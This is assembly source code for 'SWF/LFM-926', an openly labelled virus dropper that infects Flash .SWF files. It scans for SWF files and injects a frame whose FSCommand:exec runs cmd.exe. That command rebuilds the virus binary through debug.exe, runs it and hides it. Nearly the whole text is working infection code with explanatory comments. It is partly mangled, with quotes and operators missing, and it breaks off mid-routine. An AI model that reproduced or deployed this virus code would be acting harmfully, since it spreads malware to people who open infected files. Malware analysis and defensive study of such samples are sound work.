SWF/LFM-926 Virus: ; ------------------ ; Description: WinNT/XP Virus dropper for Flash .SWF files! ; Ma *** Version 6.11: ML.EXE SWF.A *** ; Virus Size: 926 bytes ; Infection Size: 3247 bytes. ; Last Edit: 01/08/2002 ; --------------------------------- Begin Source Code ------------------------------------ .286 .model tiny .code org 100h Entry: jmp Start VIR_SIZE equ Virus_End-Entry DTA db 128 dup(0) ; Offset DTA 30 = filename HANDLE dw ? ; Handle to host file PTR1 dd 0 ; Segment address of the created memory block PATH db "*.SWF",0 ; File mask BINARY db "v.com",0 ; Binary code HEX db "0123456789ABCDEF" ; Binary to hex ; Flash header block. ; ------------------- SIGN_FW dw ? ; SWF file format SIGN_S db ? VERSION_NUM db ? FILE_LENGTH dw ? dw ? STATIC_HDR_SIZE equ $-SIGN_FW RECT_BUF db 20 dup(0) ; Header length is variable because the RECT region isnt static. ;( RECT_BUF_SIZE equ $-RECT_BUF HDR_SIZE dw ? ; Holds the true header size! ; Start of Viral Frame 0. ; ----------------------- DROP_BEGIN db 03fh,003h ; DoAction Tag(12) long format. Learn the bytecodes! TAG_LENGTH dw 0 ; (ACTION LENGTH 3) 1[END_TAG] dw 0 db 083h ; ActionGetUrl Tag ACTION_LENGTH dw 0 ; (DROP_BEGIN_SIZE-9) (SUM OF DROP_MIDDLE) (DROP_END_SIZE) db FSCommand:exec db 000h db cmd.exe db 009h ; chr(9) is Flash code for a space character. db /c db 009h db echo db 009h db Loading.Flash.Movie... db & db (echo db 009h db n db 009h db v.com&echo db 009h db a db 009h db 100& DROP_BEGIN_SIZE equ $-DROP_BEGIN DROP_MIDDLE db echo db 009h db db db 009h db 71 dup(,) ; db XX,...,XX where XXs are viral hex codes. db & DROP_MIDDLE_SIZE equ $-DROP_MIDDLE DROP_END db &echo.&echo db 009h db rcx&echo db 009h db 39E ; Define hex 39E (VIR_SIZE) as a string. Changes if this code changes. db &echo db 009h db w&echo db 009h db q)|debug.exe>nul&start db 009h db /b db 009h db v.com db 000h ; StringEnd Tag DROP_END_SIZE equ $-DROP_END ; End of Viral Frame 0. ; --------------------- END_TAG db 001h ; Action code 0x01 = tagshowframe Tag Start: mov ax,(VIR_SIZE 0fh) shr ax,4 shl ax,1 mov bx,ax ; Allocate (VirusSize*2) mov ah,4ah int 21h ; Resize block jc ExProg mov dx,offset DTA ; Set DTA operation mov ah,1ah int 21h mov cx,07h mov dx,offset PATH mov ah,4eh ; FindFirst int 21h jc ExProg jmp Infect Cycle: mov dx,offset PATH mov ah,4fh ; FindNext int 21h jc ExProg jmp Infect ExProg: mov ax,4301h ; Hide v.com mov cx,02h mov dx,offset BINARY int 21h mov ax,4c00h ; End program int 21h Infect: mov byte ptr DTA[30 12],$ mov dx,offset (DTA 30) mov ax,3d02h ; Open host file int 21h jc ExProg mov [HANDLE],ax ; Save file handle mov ax,3f00h ; Read file Header mov dx,offset SIGN_FW mov bx,[HANDLE] mov cx,(STATIC_HDR_SIZE RECT_BUF_SIZE) int 21h jc ExProg cmp word ptr SIGN_FW,WF ; Check for a valid Flash SWF file. jne Cycle ; Try another file ... cmp byte ptr SIGN_S,S jne Cycle cmp byte ptr VERSION_NUM,099h ; Already infected? je Cycle mov cx,RECT_BUF_SIZE ; Search for the SetBackgroundColor Tag. xor di,di ; Seems to always exist directly after the header. next: cmp byte ptr RECT_BUF[di],043h jne not_found cmp byte ptr RECT_BUF[di 1],002h jne not_found jmp found not_found: inc di loop next jmp Cycle found: mov word ptr HDR_SIZE,STATIC_HDR_SIZE add word ptr HDR_SIZE,di ; Compute the header size mov ax,4200h ; Reset file ptr right after Flash header xor cx,cx mov dx,[HDR_SIZE] int 21h jc ExProg push bx mov ax,word ptr FILE_LENGTH add ax,15 shr ax,4 mov bx,ax mov ah,48h ; Allocate memory for target host file int 21h pop bx jc ExProg mov word ptr PTR1[2],ax ; Save pointer to allocated block mov cx,word ptr FILE_LENGTH sub cx,[HDR_SIZE] mov ah,3fh ; Read host file into memory block push ds lds dx,[PTR1] int 21h pop ds jc ExProg mov ax,4200h ; Reset file ptr to the middle code section xor cx,cx mov dx,[HDR_SIZE] add dx,DROP_BEGIN_SIZE int 21h jc ExProg ; ; The following code is a key technique. It simply converts the ; virus from binary to hex characters and then inserts them into the host ; using a standard format that DEBUG.EXE expects! Flash only really ; allows plain text, so this satisfies that condition. ; mov word ptr ACTION_LENGTH,(DROP_BEGIN_SIZE-9 DROP_END_SIZE) push bx mov cx,VIR_SIZE xor si,si xor di,di ToHex: mov bx,offset HEX ; Convert 8-bit binary number to a string representing a hex humber mov al,byte ptr Entry[si] mov ah,al and al,00001111y xlat mov DROP_MIDDLE[STATIC_HDR_SIZE di 1],al shr ax,12 xlat mov DROP_MIDDLE[STATIC_HDR_SIZE di],al inc si inc di inc di inc di mov ax,si mov bl,24 ; Debug.exe can handle at most 24 defined bytes on 1 line. div bl or ah,ah jnz cont push cx xor di,di add word ptr ACTION_LENGTH,DROP_MIDDLE_SIZE mov bx,[HANDLE] ; Write hex dump entry XX,...,XX mov dx,offset DROP_MIDDLE mov cx,DROP_MIDDLE_SIZE mov ax,4000h int 21h jc ExProg pop cx cont: loop ToHex pop bx or di,di jz no_remainder mov dx,offset DROP_MIDDLE mov cx,di add cx,7 ; STATIC_HDR_SIZE-1 add word ptr ACTION_LENGTH,cx mov ax,4000h ; Write remainder hex dump entry XX,...,XX int 21h jc ExProg no_remainder: mov dx,offset DROP_END mov cx,DROP_END_SIZE 1 mov ax,4000h ; Write end code and end of frame tag(01) into host int 21h jc ExProg mov cx,word ptr FILE_LENGTH sub cx,[HDR_SIZE] mov ax,4000h ; Write host code directly after viral code. push ds lds dx,[PTR1] int 21h pop ds jc ExProg ; Patch the header with new viral values. mov cx,word ptr ACTION_LENGTH add cx,4 mov word ptr TAG_LENGTH,cx add cx,6 add word ptr FILE_LENGTH,cx ; Total file size increase = (TAG_LENGTH 6) ; Set inf